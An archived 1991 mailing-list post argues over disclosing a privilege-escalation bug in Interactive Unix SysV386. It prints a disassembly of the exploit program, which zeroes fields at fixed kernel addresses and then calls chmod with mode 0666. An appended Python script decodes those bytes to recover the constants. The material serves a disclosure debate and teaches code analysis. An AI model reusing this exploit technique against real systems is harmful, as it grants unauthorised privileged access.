SECURITY BUG IN INTERACTIVE UNIX SYSV386
Joern Lubkoll
lumpi at dobag.in-berlin.de
Sat Feb 16 22:46:20 AEST 1991
cpcahil at virtech.uucp (Conor P. Cahill) writes:
> 2. I wholeheartedly DISAGREE with you posting the source code which
> performs the security bypass. You could have just posted the
> uuencoded binary which would have been enough to prove your point
> without making it extremely easy for any two bit user to obtain
> privileged access. Yes a dedicated hacker could have decoded
> your explanation and/or the binary and figured out how to replicate
> your code, but the number of those is MUCH less than the number
> of people who can now violate the security of the system using
> your posted code.
> POSTING THE CODE WAS DEAD WRONG.
Anyone able to use a debugger or the disassembler will be able
to get the information out of the binary!
Let's look at the disassembly (done on ISC 2.21):
--- BEGINS HERE ---
**** DISASSEMBLER ****
disassembly for toete
section .text
[startup code deleted]
11e: c7 45 fc 00 00 00 e0 movl $0xe0000000,0xfc(%ebp)
125: 8b 45 fc movl 0xfc(%ebp),%eax
128: 66 c7 80 ea 10 00 00 00 00 movw $0x0,0x10ea(%eax)
131: 8b 45 fc movl 0xfc(%ebp),%eax
134: 66 c7 80 ec 10 00 00 00 00 movw $0x0,0x10ec(%eax)
13d: 8b 45 fc movl 0xfc(%ebp),%eax
140: 66 c7 80 ee 10 00 00 00 00 movw $0x0,0x10ee(%eax)
149: 8b 45 fc movl 0xfc(%ebp),%eax
14c: 66 c7 80 f0 10 00 00 00 00 movw $0x0,0x10f0(%eax)
155: 68 b6 01 00 00 pushl $0x1b6 /* mode: 0x1b6 == 0666 octal */
15a: 68 a0 03 40 00 pushl $0x4003a0
15f: e8 0c 00 00 00 call 0xc <170> /* CHMOD */
164: 83 c4 08 addl $0x8,%esp
167: c9 leave
168: c3 ret
[Library functions deleted]
Don't you think this is enough for anyone to see what's going on?
jl
--
lumpi at dobag.in-berlin.de -- "Nothing is the complete absence of everything."
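As an added example (not code from the original post, from ISC, or from anyone in this thread), here is a small Python decoder that does by hand what the poster says a disassembler does: it takes the bytes printed in the listing above (copied into the block, offsets 0x11e through 0x168), decodes the i386 instruction forms that occur there, and follows the values through the %ebp local and %eax to recover the base constant, the four 16-bit store addresses, the call target and the pushed arguments, rendering 0x1b6 as the octal mode 0666. Which opcodes are supported, the helper names and the summary layout are my own choices; the bytes themselves are the listing's.

```python
"""Recover the constants in the posted listing from its raw bytes.

Added example for this post; not part of the original message or of any
vendor code.  Handles only the i386 instruction forms that occur in the
listing (immediate movl/movw, pushl, call, addl, leave, ret) and raises
on anything else.  CODE_HEX is copied from the listing, 0x11e..0x168.
"""
import struct

START = 0x11E
CODE_HEX = (
    "c7 45 fc 00 00 00 e0"                  # 11e: movl $0xe0000000,0xfc(%ebp)
    " 8b 45 fc 66 c7 80 ea 10 00 00 00 00"   # 125, 128
    " 8b 45 fc 66 c7 80 ec 10 00 00 00 00"   # 131, 134
    " 8b 45 fc 66 c7 80 ee 10 00 00 00 00"   # 13d, 140
    " 8b 45 fc 66 c7 80 f0 10 00 00 00 00"   # 149, 14c
    " 68 b6 01 00 00"                       # 155: pushl $0x1b6
    " 68 a0 03 40 00"                       # 15a: pushl $0x4003a0
    " e8 0c 00 00 00"                       # 15f: call
    " 83 c4 08 c9 c3"                       # 164, 167, 168
)
CODE = bytes.fromhex(CODE_HEX)


def decode(code, start):
    """Return [(address, mnemonic, operand dict)] for the supported opcodes."""
    insns, pc = [], 0

    def s8(o):
        return struct.unpack_from("<b", code, pc + o)[0]

    def s32(o):
        return struct.unpack_from("<i", code, pc + o)[0]

    def u16(o):
        return struct.unpack_from("<H", code, pc + o)[0]

    def u32(o):
        return struct.unpack_from("<I", code, pc + o)[0]

    while pc < len(code):
        addr, op = start + pc, code[pc]
        nxt = code[pc + 1] if pc + 1 < len(code) else None
        if op == 0xC7 and nxt == 0x45:                 # movl $imm32, disp8(%ebp)
            insns.append((addr, "movl", {"imm": u32(3), "disp": s8(2), "base": "ebp"}))
            pc += 7
        elif op == 0x8B and nxt == 0x45:               # movl disp8(%ebp), %eax
            insns.append((addr, "movl", {"disp": s8(2), "base": "ebp", "dst": "eax"}))
            pc += 3
        elif op == 0x66 and nxt == 0xC7 and code[pc + 2] == 0x80:  # movw $imm16, disp32(%eax)
            insns.append((addr, "movw", {"imm": u16(7), "disp": s32(3), "base": "eax"}))
            pc += 9
        elif op == 0x68:                               # pushl $imm32
            insns.append((addr, "pushl", {"imm": u32(1)}))
            pc += 5
        elif op == 0xE8:                               # call rel32, relative to next insn
            insns.append((addr, "call", {"target": (addr + 5 + s32(1)) & 0xFFFFFFFF}))
            pc += 5
        elif op == 0x83 and nxt == 0xC4:               # addl $imm8, %esp
            insns.append((addr, "addl", {"imm": s8(2), "dst": "esp"}))
            pc += 3
        elif op == 0xC9:
            insns.append((addr, "leave", {}))
            pc += 1
        elif op == 0xC3:
            insns.append((addr, "ret", {}))
            pc += 1
        else:
            raise ValueError(f"unhandled opcode {op:#04x} at {addr:#x}")
    return insns


def summarise(insns):
    """Follow values through the %ebp local and %eax: what is written, what is called."""
    frame, eax, pushes = {}, None, []
    out = {"base": None, "stores": [], "calls": []}
    for _addr, mn, ops in insns:
        if mn == "movl" and "imm" in ops:              # constant stored into a local
            frame[ops["disp"]] = ops["imm"]
            out["base"] = ops["imm"]
        elif mn == "movl" and ops.get("dst") == "eax":  # local reloaded into %eax
            eax = frame[ops["disp"]]
        elif mn == "movw":                             # 16-bit store through %eax
            out["stores"].append(((eax + ops["disp"]) & 0xFFFFFFFF, ops["imm"]))
        elif mn == "pushl":
            pushes.append(ops["imm"])
        elif mn == "call":                             # cdecl: args pushed right to left
            out["calls"].append((ops["target"], list(reversed(pushes))))
            pushes = []
    return out


def mode_octal(imm):
    """Render a pushed mode argument the way chmod(2) callers write it."""
    return f"0{imm:o}"


if __name__ == "__main__":
    s = summarise(decode(CODE, START))
    print(f"base pointer : {s['base']:#010x}")
    for a, v in s["stores"]:
        print(f"16-bit store : *(short *){a:#010x} = {v}")
    for target, args in s["calls"]:
        print(f"call {target:#x}({', '.join(hex(a) for a in args)})  mode {mode_octal(args[-1])}")
```

Run without arguments it prints the base pointer, the four store addresses and the single call with its two arguments; the point is that every constant the C source would have shown is sitting in the object code, which is what the post argues.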